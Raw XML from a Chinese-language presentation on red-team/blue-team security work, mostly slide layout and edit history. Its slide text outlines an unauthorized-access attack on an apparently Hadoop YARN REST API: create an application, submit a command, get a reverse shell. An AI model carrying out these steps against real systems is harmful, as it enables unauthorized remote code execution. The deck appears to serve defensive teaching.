        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:06:37.581" v="4466" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4260048942" sldId="515"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T05:53:35.666" v="4127" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515"/>
            <ac:spMk id="2" creationId="{18BC13FC-0ECF-4518-8C38-913D86632FF1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:06:24.017" v="4462" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515"/>
            <ac:spMk id="3" creationId="{B4F4FFB3-54D3-4801-8E5C-C0389E9C8335}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:06:24.017" v="4462" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515"/>
            <ac:spMk id="4" creationId="{CC2088E4-1807-45C9-A73D-B1C64D2F2AFB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:06:24.017" v="4462" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515"/>
            <ac:spMk id="5" creationId="{2F49C632-BC77-4A95-82A0-6453C0F098BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:06:24.017" v="4462" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515"/>
            <ac:spMk id="6" creationId="{3ED18780-E48C-4240-A0F4-E252336F664C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T05:53:33.542" v="4126" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515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5:53:27.279" v="4125" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:06:37.581" v="4466" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4260048942" sldId="515"/>
            <ac:picMk id="8" creationId="{B7D0C8B7-D4AA-43AF-9180-F651F60F82FF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:41:36.554" v="5201" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3229152861" sldId="516"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:40:21.044" v="5179" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:spMk id="5" creationId="{E776DB60-F25F-4F09-9F7B-E43E78000207}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:40:22.269" v="5180" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:spMk id="7" creationId="{AD496EAE-2EA3-4312-840B-FEA70BD54554}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:40:24.269" v="5182" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:spMk id="11" creationId="{0B5B3548-5E9E-472C-8CF9-F1C6A600C5AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:40:58.409" v="5191" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:spMk id="16" creationId="{2C719898-B7B3-474C-BFDC-C43B84EFF5B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:41:36.554" v="5201" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:40:17.108" v="5178" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:picMk id="3" creationId="{FD6CAE49-0520-458D-80C0-C1550B76D986}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:40:37.490" v="5187" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:picMk id="15" creationId="{D222CF1A-2D67-4581-AAD9-5668513C2C50}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:40:16.412" v="5177" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229152861" sldId="516"/>
            <ac:picMk id="19" creationId="{495BF136-8C56-4C16-AFC6-6174C73E3C4D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:47:21.006" v="5247" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2576713520" sldId="517"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:47:21.006" v="5247" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2576713520" sldId="517"/>
            <ac:spMk id="2" creationId="{5CF8BEA0-2EFE-46C6-B55E-A13E4EE2257F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:46:56.694" v="5244" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2576713520" sldId="517"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:41:04.757" v="5193" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2576713520" sldId="517"/>
            <ac:picMk id="3" creationId="{FD6CAE49-0520-458D-80C0-C1550B76D986}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:41:05.893" v="5194" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2576713520" sldId="517"/>
            <ac:picMk id="15" creationId="{D222CF1A-2D67-4581-AAD9-5668513C2C50}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:41:11.905" v="5198" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2576713520" sldId="517"/>
            <ac:picMk id="19" creationId="{495BF136-8C56-4C16-AFC6-6174C73E3C4D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:52:53.033" v="5435" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="684510687" sldId="518"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:52:53.033" v="5435" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="684510687" sldId="518"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:51:22.078" v="5360" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="684510687" sldId="518"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:52:33.108" v="5415" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="684510687" sldId="518"/>
            <ac:spMk id="20" creationId="{62827428-DBFD-4E85-87BA-28A76B3599B8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:03:11.767" v="5697" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="433926281" sldId="519"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:03:09.096" v="5695" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="433926281" sldId="519"/>
            <ac:spMk id="2" creationId="{1E83C5AD-82E3-462D-8590-4B344E5DB1F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:02:51.481" v="5694" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="433926281" sldId="519"/>
            <ac:spMk id="58" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:03:11.767" v="5697" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="433926281" sldId="519"/>
            <ac:spMk id="61" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:02:29.204" v="5645"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3000711078" sldId="5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1B701-AD1C-42B0-9FC5-8A4625E83919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2418" y="1143000"/>
            <a:ext cx="694283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6FA3D-866E-430F-817B-69CE69AF38F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2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4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99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0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92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8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2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6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82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09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30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0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8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0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08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7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42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红蓝对抗：深入挖掘企业安全风险点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：安全逐渐左移，有效防止新漏洞的产生</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描器：提高漏洞发现的时效性和覆盖率</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补丁：在漏洞被发现和利用之前修复</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规范：减少安全事故的发生</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：帮助企业查漏补缺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RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>weak pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提高了红蓝对抗的难度。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0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2863" y="1143000"/>
            <a:ext cx="69437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FA3D-866E-430F-817B-69CE69AF38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9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9" b="3405"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-43886" y="0"/>
            <a:ext cx="14087487" cy="6230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777232" y="5805432"/>
            <a:ext cx="4496217" cy="31212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702534" y="5805432"/>
            <a:ext cx="3231656" cy="31212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0116488" y="5805432"/>
            <a:ext cx="3231656" cy="31212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6E"/>
            </a:gs>
            <a:gs pos="24000">
              <a:srgbClr val="000468"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="000B4B"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0016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832485" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4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280" indent="-208280" algn="l" defTabSz="832485" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="910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205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130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3pPr>
      <a:lvl4pPr marL="1456690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872615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289175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705100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3121025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537585" indent="-208280" algn="l" defTabSz="83248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1pPr>
      <a:lvl2pPr marL="415925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2pPr>
      <a:lvl3pPr marL="832485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3pPr>
      <a:lvl4pPr marL="1248410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64335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80895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96820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913380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329305" algn="l" defTabSz="832485" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"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859768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7E3FB45-373B-44A0-B06F-BC87FDE69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0" y="1129485"/>
            <a:ext cx="7247505" cy="4273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03B77B-431E-4787-AB59-EF675D0C1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565" y="1144338"/>
            <a:ext cx="4142530" cy="42588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391150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A33B13-2D11-487A-B0EB-A3662DA0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7" y="660842"/>
            <a:ext cx="5391150" cy="125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A5EFA-59D6-460F-9445-B6D24A9BA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63" y="2036623"/>
            <a:ext cx="8028264" cy="41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开放的端口信息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restful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请求，仅回显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格式响应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业务大数据平台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90" y="27496"/>
            <a:ext cx="5342006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2827428-DBFD-4E85-87BA-28A76B3599B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4985098" y="3495466"/>
            <a:ext cx="4072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思考：我们能做什么？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31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6021515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1CA3DE0-5C4B-4439-A28C-0559C3598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783"/>
            <a:ext cx="14054573" cy="52310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F80381-50EE-41A5-9F9D-00B42A990ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2835479" y="1359017"/>
            <a:ext cx="2281805" cy="34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7364C6-D40D-42EF-A766-8EB9827F6491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5201174" y="1359017"/>
            <a:ext cx="453006" cy="343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0BDCFC-02DB-4F53-A6D1-ECE270D31163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6635692" y="2869035"/>
            <a:ext cx="587229" cy="352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3DE1CE-CE0D-4A06-82A9-F90ED7CB9694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11299971" y="2625754"/>
            <a:ext cx="587229" cy="352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7EA25-1B52-492A-8578-71F51276B572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7592037" y="5083728"/>
            <a:ext cx="687897" cy="31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6264722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81C3B1-23E4-4B6F-BE58-0CCF70093821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450812" y="2616753"/>
            <a:ext cx="1133381" cy="7714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53426A-0D03-4796-9F40-F84ABEEA20FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683782" y="2419452"/>
            <a:ext cx="1719670" cy="11660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Resource Manager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CF330-17B3-44B1-9F5F-05BA99DF8416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9503041" y="1167954"/>
            <a:ext cx="1452981" cy="7551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Manager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AB6539-8704-4BB8-94CB-EF99C4EB1624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9503041" y="2616753"/>
            <a:ext cx="1452981" cy="7551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Manager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D71A13-9658-4CB3-80BF-04A833EA5CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9503041" y="4211111"/>
            <a:ext cx="1452981" cy="7551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Manager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2884AB-E1CF-4DB4-A273-1D3E63D1C275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584193" y="3002487"/>
            <a:ext cx="209958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1A3C2B5-9BFD-48C7-8BCE-F67F5EE8CFC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7403452" y="1545539"/>
            <a:ext cx="2099589" cy="14569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0D1413D-5A7B-40B4-B064-39FE6E25191B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7403452" y="2994338"/>
            <a:ext cx="2099589" cy="81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6A0B05-5EF3-48F5-8C9E-E3BB4E60E5DA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7403452" y="3002487"/>
            <a:ext cx="2099589" cy="15862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633A615-6D60-4D8F-9AE3-4D4C420918A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816070" y="1345483"/>
            <a:ext cx="31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未授权访问漏洞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E9DF5D-BA3C-4233-9ED2-BFB2BB015FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5779738" y="1869282"/>
            <a:ext cx="171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 API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49A292-4E85-492B-9788-473AC7EB41E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964113" y="2542736"/>
            <a:ext cx="171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85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459075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D6CAE49-0520-458D-80C0-C1550B76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83" y="551515"/>
            <a:ext cx="7979225" cy="51390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594C8D-6371-4F83-8926-8A64D575B37C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808064" y="1491556"/>
            <a:ext cx="2609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创建新应用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58C13C-E87F-499B-9E42-30F14FAC0C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808267" y="1986984"/>
            <a:ext cx="4029176" cy="74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845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/v1/cluster/apps/new-application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59A38D5C-3B7E-4363-9696-7139FA536B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250264" y="1578063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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22288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5921412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A594C8D-6371-4F83-8926-8A64D575B37C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808064" y="1491556"/>
            <a:ext cx="2609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创建新应用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58C13C-E87F-499B-9E42-30F14FAC0C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808267" y="1986984"/>
            <a:ext cx="4029176" cy="108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845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/v1/cluster/apps/new-application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返回生成的应用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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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59A38D5C-3B7E-4363-9696-7139FA536B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250264" y="1578063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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075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222CF1A-2D67-4581-AAD9-5668513C2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65" y="668229"/>
            <a:ext cx="5248083" cy="450002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C719898-B7B3-474C-BFDC-C43B84EFF5B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818446" y="2157573"/>
            <a:ext cx="2876952" cy="23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5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5579218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A594C8D-6371-4F83-8926-8A64D575B37C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808064" y="1491556"/>
            <a:ext cx="2609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创建新应用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76DB60-F25F-4F09-9F7B-E43E78000207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1870929" y="3255842"/>
            <a:ext cx="446507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向应用下发命令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58C13C-E87F-499B-9E42-30F14FAC0C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808267" y="1986984"/>
            <a:ext cx="4029176" cy="108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845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/v1/cluster/apps/new-application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返回生成的应用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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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96EAE-2EA3-4312-840B-FEA70BD54554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871132" y="3772677"/>
            <a:ext cx="2892314" cy="108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845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/v1/cluster/apps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反弹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shell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59A38D5C-3B7E-4363-9696-7139FA536B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250264" y="1578063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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5B3548-5E9E-472C-8CF9-F1C6A600C5AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250264" y="3341881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2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075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5BF136-8C56-4C16-AFC6-6174C73E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72" y="1438399"/>
            <a:ext cx="7396543" cy="3365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F8BEA0-2EFE-46C6-B55E-A13E4EE2257F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6748691" y="2840737"/>
            <a:ext cx="3011758" cy="28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71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4"/>
